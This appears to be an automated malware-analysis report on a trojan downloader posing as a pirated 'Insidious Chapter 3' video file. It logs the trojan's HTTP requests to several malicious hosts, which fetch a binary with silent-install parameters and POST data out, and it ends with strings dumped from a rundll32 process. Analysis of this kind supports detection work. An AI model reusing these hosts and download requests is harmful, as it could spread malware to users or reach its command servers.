Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: artstickerios.info
Connection: Keep-Alive
<<< skipped >>>
HEAD /2052/TerminusKeeper_143462550383614.ca HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: artstickerios.info
Connection: Keep-Alive
HTTP/1.1 100 Continue
HTTP/1.1 200 OK
Server: openresty
Date: Wed, 01 Jul 2015 04:54:03 GMT
Content-Type: application/octet-stream
Content-Length: 3439893
Last-Modified: Thu, 18 Jun 2015 08:40:11 GMT
Connection: close
ETag: "558283eb-347d15"
Accept-Ranges: bytes
GET /?step_id=4_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:05 GMT
Content-Type: text/html
Content-Length: 8292
Connection: close
Content-Disposition: attachment; filename="4_1.txt"
<<< skipped >>>
POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5922
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:17 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..
POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5894
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:59 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..
GET /?step_id=3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:04 GMT
Content-Type: text/html
Content-Length: 8316
Connection: close
Content-Disposition: attachment; filename="3.txt"
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
rundll32.exe_1016:
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s